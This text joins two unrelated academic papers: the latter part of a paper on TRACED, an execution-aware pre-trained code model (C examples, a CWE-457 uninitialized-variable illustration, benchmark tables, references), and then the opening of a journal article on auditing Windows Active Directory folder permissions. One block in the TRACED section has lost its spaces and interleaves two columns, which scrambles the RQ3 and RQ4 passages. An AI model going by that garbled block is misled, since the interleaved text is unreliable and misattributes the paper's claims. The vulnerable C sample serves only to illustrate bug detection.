Case Study with Qualitative Examples. We present two qualitative examples in Figures 5 and 6 to concretely compare TRACED with UnixCoder on execution coverage and runtime value predictions, respectively. Both samples have simple execution logic from the human perspective, but the statically pre-trained UnixCoder still fails to estimate them correctly. Figure 5 illustrates that UnixCoder is not sensitive to distinct inputs that trigger different execution coverage, while TRACED is able to determine the numerical relations among varied values. Figure 6 illustrates TRACED's capacity for exposing abnormal program behaviors.

// Input: 19 100
#include <stdio.h>
int main(){
    int A, N, T, B;
    scanf("%d %d", &N, &A);
    T = N * N;
    B = T - A;
    if (A > 0) { printf("%d", B); }   // Branch-1
    else { printf("%d", T); }         // Branch-2
    return 0;
}

UnixCoder predictions (wrong): Branch-1: Not executed; Branch-2: Not executed
TRACED predictions (correct): Branch-1: Executed; Branch-2: Not executed

Figure 5: A qualitative example of execution coverage prediction. The source code is the same as Figure 1, but the input triggers a different execution path. TRACED correctly flips the prediction while UnixCoder keeps the same prediction.

// Input: 4 4320 4320 4320
#include <stdio.h>
int main (void) {
    int n, a, max = 0, sum = 0, i;
    for (i = 0; i < n; i++){   // Quantized value of n?
        scanf("%d", &a);
        if (a > max) max = a;
        sum += a;
    }
    printf("%d\n", sum - max / 2);
    return 0;
}

UnixCoder prediction (wrong): n: Zero
TRACED prediction (correct): n: Negative Large

Figure 6: A qualitative example of runtime value prediction. The sample contains a vulnerability of type CWE-457 "Use of Uninitialized Variable". The uninitialized n, which is randomly assigned as -32767, is used in the for-loop. TRACED successfully exposes this abnormal behavior statically by identifying n as a "Negative Large" value while UnixCoder fails. Predictions of other variables are hidden for better illustration.

Result-1: With a similar number of learnable parameters, TRACED outperforms the state-of-the-art pre-trained code model in the static estimation of program execution. Our proposed pre-training successfully encodes execution awareness into TRACED's code representations.

6.2 RQ2. Effectiveness of TRACED's Pre-training Objectives

One of the main contributions of this paper is proposing multi-task pre-training to effectively learn execution-aware code representations. In this RQ, we study the effectiveness and contribution of each of TRACED's objectives, and consequently illustrate the importance of the multiple tasks.
Interestingly,wenoticebothofLExecutor’sabstractionsperform slightlyworsethanTRACED.WespeculatethatLExecutorisnot assensitiveasTRACEDtonumericrelationsintheconditional 6.3 RQ3.Effectivenessof TRACED’sQuantized statements,astheydonotdistinguishamongsmall,regular,and VariableValues largevalues.Notethatexecutioncoverageisnotthemainfocus ofLExecutor,somorefine-grainedcategoriesarenotrequiredto Anothercontributionofthispaperisthatthesimplifiedandcom- serveitsgoal,whiletheyareempiricallyproventobenecessary pactrepresentationofprogramexecutionshelpscodemodelsto forTRACED’sscope. capturedynamiccodeproperties.InthisRQ,weempiricallyreveal thatthedesignofquantizedvariablevaluesespeciallycontributes totheeffectivelearningofthecodemodels,asitreducesthedata Result-3: TRACED’squantizedvariablevaluesdirectlycon- sparsityofvariablevaluesbutstilldefinessufficientlydetailedvalue tributetotheeffectivenessofitsexecution-awarepre-training. categoriestodistinguishdissimilarvalues. It reduces the data sparsity of concrete values but defines Toisolatetheevaluationof TRACED’squantizedvalues,we sufficientlydetailedvaluecategoriestodistinguishdissimilar pre-trainseveralvariantsbyonlyrecreatingquantizedvaluelabels, valuesforreasoningaboutexecutionpaths. i.e.,𝑞 𝑣𝑎𝑟 inEquation2,usingdifferentvalueabstractionstrategies. For example, when we pre-train a variant studying the impact 6.4 RQ4.TRACED’sPerformanceinCode ofconcretevalues,wereplaceTRACED’sdefined𝑞 𝑣𝑎𝑟 withthe UnderstandingTasks
concretetracedvalues.Asdifferentstrategiesabstractvaluesat differentgranularities,itisnotfeasibletocomparethemforthe InthisRQ,westudyTRACED’sperformanceontwocodeunder- valuepredictiontask,sincethecoarse-grainedstrategywillbenefit. standingtasks:semanticcloneretrievalandfunction-levelvulner- Therefore,weonlyfine-tunethestudiedvariantsfortheexecution abilitydetection.Notethatsamplesforthesetasksarenotpaired coverageprediction. withexecutableinputs,sothemodelneedstoreasonaboutthe Baseline.First,weconsidercomparingwithconcretevalues,asit generalcodesemanticstomakepredictions. isthemostintuitivestrategytorepresentvariablevalues.Then,we Baselines.Weconsiderfivepre-trainedcodemodelswithsimilar considertwodataabstractionsfromLExecutor[45]:coarseandfine- parametersizestoTRACED.CodeBERT[16]pre-trainsaRoBERTa grained.Theysharesimilarhigh-levelintuitionwithus,mapping modelwithMLMandreplacedtokendetection(RTD)tasks.Graph- concretevaluestopre-definedbinstoreducedatacomplexityand CodeBERT[18]isinitializedwithCodeBERTandcontinuespre- consequentlyhelpthemodel’slearning.NotethatLExecutor’sdata trainingwithaugmenteddataflowgraphstolearnthestaticdata abstractionservesadifferentgoalthanTRACED,andfocuseson dependencies.PLBART[1]andCodeT5[49]bothapplytheseq2seq PythonwhileTRACEDfocusesonC,sowecouldnotdirectlyreuse neuralarchitecture,wherePLBARTadaptstheBART[29]modelto theirpre-definedbins.Astheirdefinitionofdataabstractionisclear learncodetranslationandsummarization,andCodeT5adapts[42] andstraightforward,were-implementtheirdataabstractionfor topredictthemissingcodetokensandlocatetheidentifiers.We theClanguageandintegrateitintoourframeworkforcomparison. also,again,considerUnixCoderasabaseline. WediscussandcompareLExecutorwithTRACEDinmoredetail Results.WeshowtheresultsinTable4.Eventhoughthesamples intheRelatedWorksection(§7). inthesebenchmarksdonothaveexecutableinputs,TRACEDstill Results.ThecomparisonofvalueabstractionsareshowninFig- outperformsthestaticallypre-trainedmodelsbyaclearmargin. ure7.Unsurprisingly,concretevaluesreportpoorperformance WespeculatethereasonisthatTRACEDcouldestimatethegen- comparedtootherdataabstractions,empiricallyrevealingthediffi- eralexecutionbehaviorswithoutspecificinputs,andtheprogram cultiesforcodemodelstofitsparseandcomplexdatadistributions. semanticsregardingthesetwocodeunderstandingtaskscouldbeICSE2024,April2024,Lisbon,Portugal YangruiboDing,BenSteenhoek,KexinPei,GailKaiser,WeiLe,andBaishakhiRay Table4:ComparisonofCloneRetrievalandbugdetection. executionatthesourcecodelevelbyimitatingthedevelopers’code practice.Variablesinsourcecodehavemorecomplicateddataand Task CloneRetrieval VulnerabilityDetection valuetypesthanmachineregisters.Weintroducequantizedvalues Dataset POJ-104 RV D2A CXG inordertodecreasethedatacomplexityandsparsity. 
Table 4: Comparison of clone retrieval and bug detection.

Task          | Clone Retrieval | Vulnerability Detection
Dataset       | POJ-104         | RV   | D2A  | CXG
Metric        | MAP@R           | F1   | Acc  | Acc
CodeBERT      | 82.7            | 47.3 | 59.2 | 63.4
GraphCodeBERT | 86.7            | 46.6 | 61.0 | 62.9
PLBART-base   | 75.9            | 46.9 | 61.7 | 63.3
CodeT5-base*  | 65.9            | 46.5 | 62.1 | 64.4
UniXcoder     | 89.5            | 47.4 | 61.2 | 65.3
TRACED        | 91.2            | 50.4 | 62.1 | 65.9

*CodeT5-base has 223M parameters, roughly twice as large as the other baselines and TRACED. We report its performance because CodeT5-small has only 60M parameters and performs poorly, and CodeT5 does not provide a ~110M model.

Result-4: TRACED outperforms statically pre-trained models in clone retrieval and vulnerability detection tasks, suggesting that TRACED's general estimation of execution helps it capture code semantics more effectively.
7 RELATED WORK

Pre-trained Models for Source Code. The research community has shown a growing interest in developing pre-trained Transformer models for source code. These models can be broadly categorized into three primary architectures: Encoder-only [5, 6, 10, 16, 18, 24, 48], Decoder-only [2, 13, 50], and Encoder-decoder [1, 7, 15, 17, 35]. Encoder-only models predominantly employ the MLM objective and sequence understanding tasks (e.g., predicting the next statement [24] and contrasting semantics [10]). This architecture excels at understanding static code features. Decoder-only models, on the other hand, are typically trained by predicting code tokens in a left-to-right manner. This architecture focuses on generating code text based on learned patterns. Encoder-decoder models combine the strengths of both Encoder-only and Decoder-only models and are pre-trained using various tasks, including denoising autoencoding for reconstructing wrongly permuted tokens [1], predicting missing identifiers in the code [49], and recovering method names from the source code [35].

These models primarily focus on learning the static aspects of source code but often miss out on capturing the dynamic properties of code execution. This limitation restricts these models from accurately inferring runtime behaviors, debugging issues, and understanding complex program states.

Modeling Program Execution. Pei et al. [38-40] proposed a series of pioneering works to learn the executions of binary programs with Transformer-based models. They used concrete values from registers, which is feasible in their scope because binary programs have a smaller space of possible values and effects compared to source code. Our work, in contrast, focuses on encoding execution at the source code level by imitating the developers' code practice. Variables in source code have more complicated data and value types than machine registers; we introduce quantized values in order to decrease the data complexity and sparsity.

Several works [3, 4, 36, 44, 51] have attempted learning to execute programs as a direct goal. Souza and Pradel [45] also proposed LExecutor to predict missing values during execution. While it shares the similar intuition of mapping concrete values to discrete categories, LExecutor is distinct from TRACED in several perspectives. First, LExecutor focuses only on predicting the values, while TRACED proposes a general pre-training strategy to encode comprehensive execution awareness, not only values but also execution coverage, into the code representation. Besides, to yield code representations of better quality, TRACED jointly learns both code text and dynamic executions rather than sticking to a single perspective. Due to the distinct aims and designs, we empirically illustrate in RQ3 (§6.3) that LExecutor's value abstractions are not perfectly aligned with our scope.

Nie et al. [34] annotated programs with information about the program's possible executions without executing the code, but provided only statically available information. Conversely, several works [19, 37, 46, 47] require dynamic traces as input. We show that TRACED's pre-training is able to encode execution awareness into the code representation and estimate the dynamic semantics with static information alone.

8 THREATS TO VALIDITY

Internal Validity. First, the current design of quantized values does not cover all variables within the program, due to the complexity of their data structures, value ranges, and/or memory allocations. Second, we currently trace the program only by feeding it valid and executable inputs that will not terminate the program or throw errors. This might make the model less capable of capturing program termination and error-throwing behaviors.

External Validity. At present, TRACED supports only the C programming language. This limitation is due to the reliance on the capabilities of the tracer used to log the execution history, which may not be readily available or equally effective for other programming languages. In order to extend TRACED's applicability, it is necessary to ensure that the tracer employed can accurately and consistently capture the required information across different languages. Adapting TRACED to multiple languages would require the development or adaptation of tracers that can effectively handle the intricacies of each language and produce comparable results, enabling a consistent analysis of code behavior across a broader range of programming languages.

9 CONCLUSION

In this paper, we propose TRACED, an execution-aware pre-trained model that jointly learns static and dynamic code properties, to address the limitation of existing, statically pre-trained code models. The evaluation empirically reveals that TRACED is more effective at estimating code execution statically than statically pre-trained models. TRACED also successfully transfers execution awareness to code understanding tasks.

REFERENCES
[1] Wasi Ahmad, Saikat Chakraborty, Baishakhi Ray, and Kai-Wei Chang. 2021. Unified Pre-training for Program Understanding and Generation. In Proceedings of the 2021 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies. Association for Computational Linguistics, Online, 2655-2668. https://www.aclweb.org/anthology/2021.naacl-main.211
[2] Jacob Austin, Augustus Odena, Maxwell Nye, Maarten Bosma, Henryk Michalewski, David Dohan, Ellen Jiang, Carrie J. Cai, Michael Terry, Quoc V. Le, and Charles Sutton. 2021. Program Synthesis with Large Language Models. CoRR abs/2108.07732 (2021). arXiv:2108.07732 https://arxiv.org/abs/2108.07732
[3] David Bieber, Rishab Goel, Dan Zheng, Hugo Larochelle, and Daniel Tarlow. 2022. Static Prediction of Runtime Errors by Learning to Execute Programs with External Resource Descriptions. https://openreview.net/forum?id=SIcz2sObJ-5
[4] David Bieber, Charles Sutton, Hugo Larochelle, and Daniel Tarlow. 2020. Learning to Execute Programs with Instruction Pointer Attention Graph Neural Networks. In Advances in Neural Information Processing Systems, Vol. 33. Curran Associates, Inc., 8626-8637. https://papers.nips.cc/paper/2020/hash/62326dc7c4f7b849d6f013ba46489d6c-Abstract.html
[5] Nghi D. Q. Bui, Yijun Yu, and Lingxiao Jiang. 2021. Self-Supervised Contrastive Learning for Code Retrieval and Summarization via Semantic-Preserving Transformations. In SIGIR '21 (Virtual Event, Canada). 511-521. https://doi.org/10.1145/3404835.3462840
[6] Luca Buratti, Saurabh Pujar, Mihaela Bornea, Scott McCarley, Yunhui Zheng, Gaetano Rossiello, Alessandro Morari, Jim Laredo, Veronika Thost, Yufan Zhuang, and Giacomo Domeniconi. 2020. Exploring Software Naturalness through Neural Language Models. arXiv:2006.12641 [cs.CL]
[7] Saikat Chakraborty, Toufique Ahmed, Yangruibo Ding, Premkumar Devanbu, and Baishakhi Ray. 2022. NatGen: Generative pre-training by "Naturalizing" source code. In 2022 The ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE). ACM.
[8] Saikat Chakraborty, Rahul Krishna, Yangruibo Ding, and Baishakhi Ray. 2021. Deep Learning based Vulnerability Detection: Are We There Yet. IEEE Transactions on Software Engineering (2021), 1-1. https://doi.org/10.1109/TSE.2021.3087402
[9] Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. 2019. BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1. Association for Computational Linguistics, Minneapolis, Minnesota, 4171-4186. https://doi.org/10.18653/v1/N19-1423
[10] Yangruibo Ding, Luca Buratti, Saurabh Pujar, Alessandro Morari, Baishakhi Ray, and Saikat Chakraborty. 2022. Towards Learning (Dis)-Similarity of Source Code from Program Contrasts. In Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers). Association for Computational Linguistics, Dublin, Ireland, 6300-6312. https://doi.org/10.18653/v1/2022.acl-long.436
[11] Yangruibo Ding, Baishakhi Ray, Devanbu Premkumar, and Vincent J. Hellendoorn. 2020. Patching as Translation: the Data and the Metaphor. In 35th IEEE/ACM International Conference on Automated Software Engineering (Virtual Event, Australia) (ASE '20). https://doi.org/10.1145/3324884.3416587
[12] Adam Paszke et al. 2019. PyTorch: An Imperative Style, High-Performance Deep Learning Library.
[13] Mark Chen et al. 2021. Evaluating Large Language Models Trained on Code. CoRR abs/2107.03374 (2021). arXiv:2107.03374 https://arxiv.org/abs/2107.03374
[14] Thomas Wolf et al. 2020. Transformers: State-of-the-Art Natural Language Processing. In Proceedings of the 2020 Conference on Empirical Methods in Natural Language Processing: System Demonstrations. Association for Computational Linguistics, Online, 38-45. https://doi.org/10.18653/v1/2020.emnlp-demos.6
[15] Yujia Li et al. 2022. Competition-Level Code Generation with AlphaCode. ArXiv abs/2203.07814 (2022).
[16] Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, and Ming Zhou. 2020. CodeBERT: A Pre-Trained Model for Programming and Natural Languages. In Findings of the Association for Computational Linguistics: EMNLP 2020. Association for Computational Linguistics, Online, 1536-1547. https://doi.org/10.18653/v1/2020.findings-emnlp.139
[17] Daya Guo, Shuai Lu, Nan Duan, Yanlin Wang, Ming Zhou, and Jian Yin. 2022. UniXcoder: Unified Cross-Modal Pre-training for Code Representation. https://doi.org/10.48550/ARXIV.2203.03850
[18] Daya Guo, Shuo Ren, Shuai Lu, Zhangyin Feng, Duyu Tang, Shujie Liu, Long Zhou, Nan Duan, Alexey Svyatkovskiy, Shengyu Fu, Michele Tufano, Shao Kun Deng, Colin Clement, Dawn Drain, Neel Sundaresan, Jian Yin, Daxin Jiang, and Ming Zhou. 2021. GraphCodeBERT: Pre-training Code Representations with Data Flow. In International Conference on Learning Representations. https://openreview.net/forum?id=jLoC4ez43PZ
[19] Jordan Henkel, Shuvendu K. Lahiri, Ben Liblit, and Thomas Reps. 2018. Code vectors: understanding programs through embedded abstracted symbolic traces. In Proceedings of the 2018 26th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2018). Association for Computing Machinery, New York, NY, USA, 163-174. https://doi.org/10.1145/3236024.3236085
[20] Abram Hindle, Earl T. Barr, Zhendong Su, Mark Gabel, and Premkumar Devanbu. 2012. On the Naturalness of Software. In Proceedings of the 34th International Conference on Software Engineering (Zurich, Switzerland) (ICSE '12). IEEE Press, 837-847.
[21] Nan Jiang, Kevin Liu, Thibaud Lutellier, and Lin Tan. 2023. Impact of Code Language Models on Automated Program Repair. arXiv:2302.05020 [cs.SE]
[22] Nan Jiang, Thibaud Lutellier, Yiling Lou, Lin Tan, Dan Goldwasser, and Xiangyu Zhang. 2023. KNOD: Domain Knowledge Distilled Tree Decoder for Automated Program Repair. arXiv:2302.01857 [cs.SE]
[23] Nan Jiang, Thibaud Lutellier, and Lin Tan. 2021. CURE: Code-Aware Neural Machine Translation for Automatic Program Repair. In 2021 IEEE/ACM 43rd International Conference on Software Engineering (ICSE). 1161-1173. https://doi.org/10.1109/ICSE43902.2021.00107
[24] Aditya Kanade, Petros Maniatis, Gogul Balakrishnan, and Kensen Shi. 2020. Learning and evaluating contextual embedding of source code. In ICML 2020.
[25] Rafael-Michael Karampatsis, Hlib Babii, Romain Robbes, Charles Sutton, and Andrea Janes. 2020. Big Code != Big Vocabulary: Open-Vocabulary Models for Source Code. In 2020 IEEE/ACM 42nd International Conference on Software Engineering (ICSE). 1073-1085.
[26] Seulbae Kim, Seunghoon Woo, Heejo Lee, and Hakjoo Oh. 2017. VUDDY: A Scalable Approach for Vulnerable Code Clone Discovery. In 2017 IEEE Symposium on Security and Privacy (SP). 595-614. https://doi.org/10.1109/SP.2017.62
[27] Diederik P. Kingma and Jimmy Ba. 2015. Adam: A Method for Stochastic Optimization. CoRR abs/1412.6980 (2015).
[28] Taku Kudo and John Richardson. 2018. SentencePiece: A simple and language independent subword tokenizer and detokenizer for Neural Text Processing. In Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing: System Demonstrations. Association for Computational Linguistics, Brussels, Belgium, 66-71. https://doi.org/10.18653/v1/D18-2012
[29] Mike Lewis, Yinhan Liu, Naman Goyal, Marjan Ghazvininejad, Abdelrahman Mohamed, Omer Levy, Veselin Stoyanov, and Luke Zettlemoyer. 2020. BART: Denoising Sequence-to-Sequence Pre-training for Natural Language Generation, Translation, and Comprehension. In Proceedings of the 58th Annual Meeting of the Association for Computational Linguistics. Association for Computational Linguistics, Online, 7871-7880. https://doi.org/10.18653/v1/2020.acl-main.703
[30] Zhen Li, Deqing Zou, Shouhuai Xu, Hai Jin, Hanchao Qi, and Jie Hu. 2016. VulPecker: An Automated Vulnerability Detection System Based on Code Similarity Analysis. In Proceedings of the 32nd Annual Conference on Computer Security Applications (Los Angeles, California, USA) (ACSAC '16). 201-213. https://doi.org/10.1145/2991079.2991102
[31] Yinhan Liu, Myle Ott, Naman Goyal, Jingfei Du, Mandar Joshi, Danqi Chen, Omer Levy, Mike Lewis, Luke Zettlemoyer, and Veselin Stoyanov. 2019. RoBERTa: A Robustly Optimized BERT Pretraining Approach. CoRR abs/1907.11692 (2019). arXiv:1907.11692 http://arxiv.org/abs/1907.11692
[32] Shuai Lu, Daya Guo, Shuo Ren, Junjie Huang, Alexey Svyatkovskiy, Ambrosio Blanco, Colin B. Clement, Dawn Drain, Daxin Jiang, Duyu Tang, Ge Li, Lidong Zhou, Linjun Shou, Long Zhou, Michele Tufano, Ming Gong, Ming Zhou, Nan Duan, Neel Sundaresan, Shao Kun Deng, Shengyu Fu, and Shujie Liu. 2021. CodeXGLUE: A Machine Learning Benchmark Dataset for Code Understanding and Generation. CoRR abs/2102.04664 (2021).
[33] Lili Mou, Ge Li, Lu Zhang, Tao Wang, and Zhi Jin. 2016. Convolutional neural networks over tree structures for programming language processing. In Proceedings of the Thirtieth AAAI Conference on Artificial Intelligence. 1287-1293.
[34] Pengyu Nie, Rahul Banerjee, Junyi Jessy Li, Raymond J. Mooney, and Milos Gligoric. 2023. Learning Deep Semantics for Test Completion. arXiv:2302.10166 [cs]. https://doi.org/10.48550/arXiv.2302.10166
[35] Changan Niu, Chuanyi Li, Vincent Ng, Jidong Ge, Liguo Huang, and Bin Luo. 2022. SPT-Code: Sequence-to-Sequence Pre-Training for Learning Source Code Representations. CoRR abs/2201.01549 (2022). arXiv:2201.01549 https://arxiv.org/abs/2201.01549
[36] Maxwell Nye, Anders Johan Andreassen, Guy Gur-Ari, Henryk Michalewski, Jacob Austin, David Bieber, David Dohan, Aitor Lewkowycz, Maarten Bosma, David Luan, Charles Sutton, and Augustus Odena. 2021. Show Your Work: Scratchpads for Intermediate Computation with Language Models. https://doi.org/10.48550/arXiv.2112.00114
[37] Jibesh Patra and Michael Pradel. 2022. Nalin: learning from runtime behavior to find name-value inconsistencies in jupyter notebooks. In Proceedings of the 44th International Conference on Software Engineering. ACM, Pittsburgh, Pennsylvania, 1469-1481. https://doi.org/10.1145/3510003.3510144
[38] Kexin Pei, Jonas Guan, Matthew Broughton, Zhongtian Chen, Songchen Yao, David Williams-King, Vikas Ummadisetty, Junfeng Yang, Baishakhi Ray, and Suman Jana. 2021. StateFormer: fine-grained type recovery from binaries using generative state modeling. In Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2021). Association for Computing Machinery, New York, NY, USA, 690-702. https://doi.org/10.1145/3468264.3468607
[39] Kexin Pei, Dongdong She, Michael Wang, Scott Geng, Zhou Xuan, Yaniv David, Junfeng Yang, Suman Jana, and Baishakhi Ray. 2022. NeuDep: neural binary memory dependence analysis. In Proceedings of the 30th ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2022). Association for Computing Machinery, New York, NY, USA, 747-759. https://doi.org/10.1145/3540250.3549147
[40] Kexin Pei, Zhou Xuan, Junfeng Yang, Suman Jana, and Baishakhi Ray. 2020. Trex: Learning Execution Semantics from Micro-Traces for Binary Similarity. CoRR abs/2012.08680 (2020). arXiv:2012.08680 https://arxiv.org/abs/2012.08680
[41] Ruchir Puri, David S. Kung, Geert Janssen, Wei Zhang, Giacomo Domeniconi, Vladimir Zolotov, Julian Dolby, Jie Chen, Mihir R. Choudhury, Lindsey Decker, Veronika Thost, Luca Buratti, Saurabh Pujar, and Ulrich Finkler. 2021. Project CodeNet: A Large-Scale AI for Code Dataset for Learning a Diversity of Coding Tasks. CoRR abs/2105.12655 (2021). arXiv:2105.12655 https://arxiv.org/abs/2105.12655
[42] Colin Raffel, Noam Shazeer, Adam Roberts, Katherine Lee, Sharan Narang, Michael Matena, Yanqi Zhou, Wei Li, and Peter J. Liu. 2020. Exploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer. Journal of Machine Learning Research 21, 140 (2020), 1-67. http://jmlr.org/papers/v21/20-074.html
[43] Baishakhi Ray, Vincent Hellendoorn, Saheel Godhane, Zhaopeng Tu, Alberto Bacchelli, and Premkumar Devanbu. 2016. On the "Naturalness" of Buggy Code. In Proceedings of the 38th International Conference on Software Engineering (Austin, Texas) (ICSE '16). Association for Computing Machinery, New York, NY, USA, 428-439. https://doi.org/10.1145/2884781.2884848
[44] Scott Reed and Nando de Freitas. 2016. Neural Programmer-Interpreters. arXiv:1511.06279 [cs]. https://doi.org/10.48550/arXiv.1511.06279
[45] Beatriz Souza and Michael Pradel. 2023. LExecutor: Learning-Guided Execution. arXiv:2302.02343 [cs]. https://doi.org/10.48550/arXiv.2302.02343
[46] Ke Wang, Rishabh Singh, and Zhendong Su. 2018. Dynamic Neural Program Embeddings for Program Repair. https://openreview.net/forum?id=BJuWrGW0Z
[47] Ke Wang and Zhendong Su. 2020. Blended, precise semantic program embeddings. In Proceedings of the 41st ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI 2020). Association for Computing Machinery, New York, NY, USA, 121-134. https://doi.org/10.1145/3385412.3385999
[48] Xin Wang, Yasheng Wang, Fei Mi, Pingyi Zhou, Yao Wan, Xiao Liu, Li Li, Hao Wu, Jin Liu, and Xin Jiang. 2021. SynCoBERT: Syntax-Guided Multi-Modal Contrastive Pre-Training for Code Representation. https://doi.org/10.48550/ARXIV.2108.04556
[49] Yue Wang, Weishi Wang, Shafiq Joty, and Steven C. H. Hoi. 2021. CodeT5: Identifier-aware Unified Pre-trained Encoder-Decoder Models for Code Understanding and Generation. In Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing, EMNLP 2021.
[50] Frank F. Xu, Uri Alon, Graham Neubig, and Vincent J. Hellendoorn. 2022. A Systematic Evaluation of Large Language Models of Code. arXiv preprint arXiv:2202.13169 (2022).
[51] Wojciech Zaremba and Ilya Sutskever. 2015. Learning to Execute. https://doi.org/10.48550/arXiv.1410.4615
[52] Andreas Zeller. 2005. Why Programs Fail: A Guide to Systematic Debugging. Morgan Kaufmann Publishers Inc., San Francisco, CA, USA.
[53] Yunhui Zheng, Saurabh Pujar, Burn Lewis, Luca Buratti, Edward Epstein, Bo Yang, Jim Laredo, Alessandro Morari, and Zhong Su. 2021. D2A: A Dataset Built for AI-Based Vulnerability Detection Methods Using Differential Analysis. In 2021 IEEE/ACM 43rd International Conference on Software Engineering: Software Engineering in Practice (ICSE-SEIP). 111-120. https://doi.org/10.1109/ICSE-SEIP52600.2021.00020
[54] Yaqin Zhou, Shangqing Liu, Jingkai Siow, Xiaoning Du, and Yang Liu. 2019. Devign: Effective vulnerability identification by learning comprehensive program semantics via graph neural networks. In Advances in Neural Information Processing Systems. 10197-10207.
2306.07734

OKU Journal of The Institute of Science and Technology, 5(2): 534-550, 2022
Osmaniye Korkut Ata University, Journal of The Institute of Science and Technology

An Inverse Approach to Windows' Resource-Based Permission Mechanism for Access Permission Vulnerability Detection

Hakan TEMİZ 1*, Ahmet BÜYÜKEKE 2
1 Control and Automation Technology, Borçka Acarlar Vocational School, Artvin Çoruh University, Artvin, 08000, Turkey (https://orcid.org/0000-0002-1351-7565)
2 Management Information Systems, Faculty of Business, Adana Alparslan Türkeş Science and Technology University, Adana, 01250, Turkey (https://orcid.org/0000-0002-6103-7646)
*Corresponding author: htemiz@artvin.edu.tr

Research Article

Article History: Received: 08.12.2021; Accepted: 10.01.2022; Published online: 18.07.2022

Keywords: Active directory users; Windows Server; Access permissions; Security vulnerability; Inspection; Reporting

ABSTRACT: In organizations, employees work with information stored in files according to their duties and responsibilities. Windows uses resource-based access permissions: any permission for any user has to be set separately per resource. This method gets complicated as the number of resources and users increases, and causes oversights in assigning permissions. Therefore, a special mechanism is required to scrutinize what permissions any employee has on any set of resources. This requirement is met by reversing Windows' resource-based approach into a view of user-accessible resources. The approach is implemented by a program allowing quick and easy examination and reporting of any type of permission granted or denied to active directory users on any number of folders.
According to our surveys, this is the first time that such a tool, accomplishing the above-mentioned tasks in a different way than Windows' built-in tools, has been developed. The proposed method enables administrators to make sure there is no missing or overlooked setting that could cause a security vulnerability. This approach can easily be extended to scrutinize other resources and other local or active directory objects.

To Cite: Temiz H., Büyükeke A. An Inverse Approach to Windows' Resource-Based Permission Mechanism for Access Permission Vulnerability Detection. Osmaniye Korkut Ata Üniversitesi Fen Bilimleri Enstitüsü Dergisi 2022; 5(2): 534-550.

1. Introduction

It is obvious that, in an organization, users should not have access to any resources that do not match their roles and privileges. They may, either intentionally or unintentionally, collect sensitive company information from files and folders, or, going even further, corrupt, delete, or alter them. Although accidents can and will happen occasionally, they are often more striking in their effect when caused by administrators. So administrators have to be especially careful when granting or denying permissions to Active Directory (AD) users, groups, or services on resources. Issues in accessing files or folders are frequently caused by underlying recent modifications, especially rights denied via groups or altered permissions on parent folders (NTFS, 2021). Thus, it is very important to preserve a structured folder hierarchy, especially in a large environment with many users and groups.

As the number of users and resources (e.g., files, folders) increases, it becomes harder and more complex for administrators to keep access rights under control and to verify that everything is in order. Monitoring also becomes more difficult accordingly. Beyond a certain point, oversights and omissions begin to occur in assigning access rights. This leads to unexpected and uncontrollable consequences in how users access resources.

The Graphical User Interface (GUI) is Windows' primary mechanism for assigning access permissions, though there are also a few command-line tools (e.g., icacls), each serving a specific purpose and not easy to use. These tools are not user friendly, as they do not provide any GUI. In Windows, the GUI remains the first option for administrators to grant, deny, and check access
permissions on resources (e.g., folders). However, the GUI only allows setting permissions on a particular securable object (SO) and, if it is a folder, on its subfolders via inheritance. Thus, each SO (e.g., a file, folder, registry key, service, or printer) has to be processed individually through the GUI. Scrutinizing what permissions are granted or denied to any user or group on a list of files or folders therefore turns into a very difficult, cumbersome, and time-consuming job. On the other hand, administrators often need to check whether any inappropriate permissions have been granted or denied to a user or group on a set of files or folders. The only way of doing such a task, for example for multiple folders, is to inspect the permission entries via this GUI for each one. It is not possible to investigate the access permissions of one or more users or groups on multiple folders or files with a single click. On top of that, the number of SOs can reach tens of thousands. No means exists in the GUI to process multiple resources in this manner. The lack of such means makes this job overwhelming, time-consuming, and error-prone. As a result, administrators are prone to failing to assign permissions properly.

This article presents a novel approach that addresses the effective access permissions of active directory users in a user-based form, rather than the resource-based form that Windows uses. A program was developed to implement this approach. It was tested in a network environment managed by the Windows Server 2012 operating system. It is shown that this approach makes it easy and quick to examine and report any number of permissions allowed or denied to any number of users on any number of folders. With this approach, administrators can seamlessly check whether there is any missing or overlooked setting that could cause a security vulnerability by inspecting the active access status of AD users to multiple folders. In this way, administrators in the information technology (IT) departments of companies do not waste their valuable time and can focus on other duties. This approach can be applied to other active directory or local objects with slight modifications to the program.

2. Related Works

Administrators of company IT departments have many tasks in their daily routines: network security, license management, antivirus, firewalls, backups, software installation and updates, recovery, user support, monitoring, user accounts and permissions, file organization and management, shared folders, and so on. Each is very important. Companies use Microsoft's AD to centrally manage and organize many of the above-mentioned tasks and company resources (Binduf et al., 2018). In a typical network, users work with or generate precious information contained in shared files and folders. Every local or AD user (as well as groups and services) should be able to access the resources related to their role with appropriate rights and should not be able to access other, irrelevant resources. Therefore, they must have the appropriate permissions (grants or denials) for these resources, but no more than necessary. This is critical for mitigating information leakage, data loss (e.g., accidental deletion), and so on. That is why administrators put a lot of effort into assigning rights to users.

In Windows, the security tab in the properties dialog of SOs is the main checkpoint for setting permissions on resources. Users or groups are authorized or denied certain access roles on a per-resource basis.
This means that, for example, each folder has to be handled individually by administrators through this GUI, unless command-line tools are used. On the other hand, it is very important for administrators to make sure permissions are set appropriately on multiple folders: users can access the resources they need with the proper rights and cannot access the ones they should not.

